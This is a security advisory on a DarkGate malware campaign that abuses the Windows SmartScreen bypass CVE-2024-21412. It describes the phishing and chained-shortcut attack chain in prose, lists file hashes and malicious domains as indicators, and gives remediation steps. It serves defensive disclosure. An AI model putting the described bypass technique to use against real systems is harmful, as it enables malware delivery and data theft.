Rewterz Threat Alert – New DarkGate Malware Campaign Exploits Windows SmartScreen Vulnerability to Bypass Security – Active IOCs

Severity

High

Analysis Summary

A new campaign propagating the DarkGate malware in multiple waves of attacks has been leveraging a now-patched Windows Defender SmartScreen security flaw to bypass security checks and automatically download malicious software installers.

SmartScreen is a Windows feature that provides a layer of security by displaying a warning whenever the user tries to run suspicious or unrecognized files that are downloaded from the internet. The vulnerability in Windows Defender SmartScreen is tracked as CVE-2024-21412 and can allow specially crafted downloaded files to bypass these security warnings. Threat actors are capable of exploiting it by making a Windows Internet Shortcut that points to another .url file which is hosted on a remote SMB share, causing the file present as the final location to be executed automatically.

Microsoft released a patch for the vulnerability in mid-February after it was disclosed that the financially motivated advanced persistent group Water Hydra exploited it as a zero-day to distribute their DarkMe malware onto various traders’ systems. Recently, researchers warned that the threat actors behind DarkGate also exploit the same vulnerability to infect targeted machines successfully.

The attack chain starts with a phishing email containing a PDF file attachment with links that leverage Google DoubleClick Digital Marketing (DDM) services for open redirects to bypass email security checks. When an unsuspecting user clicks on the link, they are directed to a web server that is compromised and hosts an internet shortcut file, which links to another shortcut file hosted on an actor-controlled WebDAV server. The use of one Windows Shortcut to open a second one on a remote server successfully exploits the CVE-2024-21412 vulnerability and causes a malicious MSI file to execute on the system automatically.

The MSI files pretend to be legitimate software from NVIDIA, Notion, and the Apple iTunes app. Once the MSI installer is executed, another DLL side-loading vulnerability that involves a “libcef.dll” file and a loader called “sqlite3.dll” will be decrypted and finally execute the DarkGate malware payload on the device. After its initialization, the malware is capable of data theft, fetching additional payloads, running process injection, keylogging, and providing real-time remote access to the threat actors.

The latest campaign uses DarkGate version 6.1.7, featuring XOR-encrypted configuration, updated command-and-control (C2) values, and new configuration options that the older version 5 didn’t have. These new configuration parameters allow the operators to determine different operational tactics and evasion techniques, like specifying minimum disk storage and RAM size or enabling startup persistence to avoid analysis environments. It is highly recommended to apply Microsoft’s latest updates that patch CVE-2024-21412 to mitigate the risk posed by these attacks.

Impact

• Security Bypass
• Sensitive Data Theft
• Keylogging
• Unauthorized Access

Indicators of Compromise

MD5

• 3a0baa797d0f1c7fb1d4eb267debe554
• 22af6acd1176393e7b5c1b3b9a08a57f
• 97fa64106421d033b21c848fdbb9f874
• 8cbc23c2bfbe9ef82e702a3a0a47b4d6
• 1c6b82249d34db4cce49bcf5397b69de
• 5d9a13a7cac144013d8a985efd0a6658
• 2467f31cdec445df68ec6244726cb273
• 986f09656e4864f9731312b0343df116
• afe012ed0d96abfe869b9e26ea375824
• 3a9f91ad3d546b1f531bbb09ab99b007

SHA-256

• 74c69940f96ccad21c7bfa75d6ee8dec4a78b16e0a32abe104d24c2076a574d5
• 736525350539904d19d4028dfc6be5feac95b662c0cc841bed640794cfb2e8e9
• 0f60919d6fc810b602c70eafeb55ddf0dc0f72f8c23162a76148647f65cddc7d
• f8818081bdc2dbf059ae5494a06fe2893900190f27b26f7af29c8fad95ed7ab2
• 11e7a00771278ad3931332c4cf062e8ca01a70ffd11d5e89e3e428d30faf572c
• a53be1e2a6f17a5f4c22ac6fcd24fd70e04cd2c768ed83e84155e37b2a14bcbd
• 1efbfb8f9e441370bb3f3a316fea237564eefebbf4ba33cccdae5f853c86a7b0
• 8738866be2f39ac05df243bbe2c82dfc6c125643cc5c75e5f199701fbacc90c9
• 18d87c514ff25f817eac613c5f2ad39b21b6e04b6da6dbe8291f04549da2c290
• f75e5e1905d8de78f99f28710dcf9774c3d5d876dd3c1ccbe49e18a6b47aad2b

SHA-1

• 4d74de5d8a269eb22bdc2ab3563d7fd4f819d1a9
• 15f3442262130170bd1c43f26e76e63ec29c815c
• 51b174ceb1a79dcb9a36581dc49002d119f54494
• c31655e58bee7439cfd1eb792257d7c197560573
• 13b52bec967b7c2fd02a80a26ad3311ba9c0c399
• 43707fcff6b4aace232f26fe3d07c30d3b40e1a6
• cbdff6c3430b4d2ddd1d3fb16ea94ff09b98913b
• c83264f9d18f45359a3c31822a35eeea24218e0e
• c562a7bd1d5e72248a1eae7b47d1dc18db8432c0
• 4008e09855f66f0fcd4213a11dc36fe05abb9926

Domain Name

• jenb128hiuedfhajduihfa.com
• elshoppingdelalimpieza.com.ar
• selectwendormo9tres.com
• newdomainfortesteenestle.com
• lili19mainmasters.com
• stachmentsuprimeresult.com
• strongdomainsercgerhhost.com
• pjnbadfjandkadm3kd.com

Remediation

• Use Microsoft Automatic Update to apply the appropriate patch for your system, or the Microsoft Security Update Guide to search for available patches.
• Block all threat indicators at your respective controls.
• Search for Indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Never trust or open links and attachments received from unknown sources/senders.
• Implement multi-factor authentication to add an extra layer of security to login processes.
• Regularly monitor network activity for any unusual behavior, as this may indicate that a cyberattack is underway.
• Organizations need to stay vigilant and follow best practices for cybersecurity to protect their systems and data from potential threats. This includes regularly updating software and implementing strong access controls and monitoring tools.
• Develop a comprehensive incident response plan to respond effectively in case of a security breach or data leakage.
• Maintain regular backups of critical data and systems to ensure data recovery in case of a security incident.
• Adhere to security best practices, including the principle of least privilege, and ensure that users and applications have only the necessary permissions.
• Establish a robust patch management process to ensure that security patches are evaluated, tested, and applied promptly.
• Conduct security audits and assessments to evaluate the overall security posture of your systems and networks.
• Implement network segmentation to contain and isolate potential threats to limit their impact on critical systems.